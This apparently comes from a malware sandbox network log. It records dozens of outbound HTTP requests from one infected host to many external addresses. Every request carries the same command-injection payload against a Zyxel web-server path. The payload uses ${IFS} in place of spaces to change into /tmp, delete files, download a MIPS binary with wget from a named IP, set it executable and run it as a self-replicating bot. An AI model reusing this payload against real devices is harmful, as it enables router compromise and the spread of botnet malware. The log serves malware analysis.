                                      Jan 19, 2024 17:29:29.711158037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3662192.168.2.1460700209.182.230.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711182117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3663192.168.2.144034217.123.58.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711218119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3664192.168.2.1447272142.117.18.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711247921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3665192.168.2.1438822122.163.102.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711301088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3666192.168.2.1438810154.188.254.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711337090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3667192.168.2.144580464.232.125.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711369991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3668192.168.2.1436954212.201.210.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711389065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3669192.168.2.1460384137.10.203.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711430073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3670192.168.2.144369474.227.78.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711471081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3671192.168.2.1447586222.156.132.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711499929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3672192.168.2.144531087.116.153.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711527109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3673192.168.2.145543277.110.171.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711560965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3674192.168.2.1441520208.47.209.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711622953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3675192.168.2.144974076.211.46.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711656094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3676192.168.2.1444608128.21.136.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711695910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3677192.168.2.144750065.22.166.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711734056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3678192.168.2.1439688145.89.80.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711752892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3679192.168.2.143918686.45.23.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711824894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3680192.168.2.1445120125.205.6.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711853981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3681192.168.2.144837020.112.68.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711910963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3682192.168.2.1449112163.99.209.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711945057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3683192.168.2.144423237.95.72.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.711992979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3684192.168.2.1460630171.12.54.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712028027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3685192.168.2.1453234100.56.4.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712057114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3686192.168.2.1432918130.78.254.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712080002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3687192.168.2.1460922210.58.70.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712136030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3688192.168.2.1443636129.16.64.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712182999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3689192.168.2.1433526169.108.207.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712204933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3690192.168.2.1445174183.82.209.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712248087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3691192.168.2.1453492223.42.119.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712270975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3692192.168.2.1445584131.60.4.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712326050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3693192.168.2.144588445.133.128.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712352991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3694192.168.2.145026651.34.229.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712394953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3695192.168.2.1452142222.133.150.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712430954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3696192.168.2.1457490155.120.127.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712480068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3697192.168.2.1451788216.102.225.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712505102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3698192.168.2.143299073.66.143.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712531090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3699192.168.2.1460294172.147.94.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712565899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3700192.168.2.1455672202.185.52.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712635994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3701192.168.2.1435390141.57.58.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712665081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3702192.168.2.145820858.213.184.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712704897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3703192.168.2.1450400165.73.145.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712738991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3704192.168.2.145735037.165.234.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712758064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3705192.168.2.1438870146.190.32.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712790966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3706192.168.2.14522668.163.60.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712809086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3707192.168.2.1437570205.155.246.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712953091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3708192.168.2.1442402216.2.236.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.712986946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3709192.168.2.1437672149.230.31.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713023901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3710192.168.2.145554054.142.201.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713047028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3711192.168.2.1450890183.191.67.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713069916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3712192.168.2.144906493.110.28.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713097095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3713192.168.2.143309637.184.55.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713139057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3714192.168.2.14355389.88.130.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713186979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3715192.168.2.145196882.191.212.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713232994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3716192.168.2.145827069.28.24.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713237047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3717192.168.2.145043831.221.180.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713298082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3718192.168.2.1446288135.64.162.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713335037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3719192.168.2.145821664.57.225.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713398933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3720192.168.2.145978298.132.56.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713424921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3721192.168.2.144032227.247.82.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713447094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3722192.168.2.1445524159.40.88.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713475943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3723192.168.2.144292024.137.92.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713538885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3724192.168.2.1449788156.115.208.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713553905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3725192.168.2.1452892106.192.48.97443
                                      TimestampBytes transferredDirectionData
